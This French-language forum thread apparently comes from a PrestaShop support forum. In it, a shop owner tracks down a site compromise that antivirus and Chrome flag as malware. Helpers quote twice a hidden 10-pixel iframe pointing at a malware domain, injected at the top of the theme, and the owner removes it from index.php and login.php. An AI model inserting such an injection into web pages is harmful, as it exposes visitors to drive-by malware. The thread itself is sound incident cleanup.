Jump to content

Procédure de sécurité à lire attentivement


Carl Favre

Recommended Posts

j'ai regardé tous les scripts, j'ai pas trouvé de bout de code bizarre

de plus, quand j'ai voulu importé ma partie admin en locale, j'ai mon antivirus qui s'est déclenché pour le meme cheval de troie

Si quelqu'un pouvait me donner un coup de main, ce serait super !!!

Link to comment
Share on other sites

Sur quels fichiers as-tu eu l'alerte ?

 

Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire :

 

<iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

Link to comment
Share on other sites

bien vu, une iframe avec visibility:hidden : suspect en vue !

 

Avec chrome j'ai une page d'avertissement qui m'empèche d'aller sur le site avec comme message : www.ronde-des-bijoux.com fournit du contenu provenant de novikkoll.in, un site connu pour distribuer des logiciels malveillants. Votre ordinateur pourrait être infecté par un virus si vous consultez ce site.

Link to comment
Share on other sites

Sur quels fichiers as-tu eu l'alerte ?

 

Vérifie bien tous les fichiers de ton thème, j'ai vu en début de ton thème le code suivant qui n'a rien à y faire :

 

<iframe src="http://novikkoll.in/in.cgi?default" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></iframe>

 

 

Ceci provient certainement d'un module "vérolé", il faudrait avoir la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions

Link to comment
Share on other sites

1- il nous faut la liste des module installés dans les hooks "top of pages" et aussi dans "header of pages", tu trouvera cette liste dans ton back office : modules>positions

2- sinon c'est dans le thème : par exemple le fichier www.ronde-des-bijoux.com/themes/LE_NOM_DE_TON_THEME/header.tpl

Link to comment
Share on other sites

dans mon "top of pages" il y a :

- bloc informations client

- pages introuvables

- mots clés

et dans mon "header of pages" :

- url canonique

- bloc recherche rapide

- atos

j'ai déja vérifié ces modules et je n'ai rien trouvé. Je refais un tour du coté des *.js

Link to comment
Share on other sites

Je pense que j'ai trouvé c'etait dans mes index.php et login.php, j'ai renvoye un code source qui etait propre et je ne vois plus apparaitre le fameux iframe.

 

Est ce que quelqu'un peu vérifier SVP, en tout cas merci d'avance pour l'aide que vous m'avez apporté et les idées de recherches.

Link to comment
Share on other sites

  • 4 months later...

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...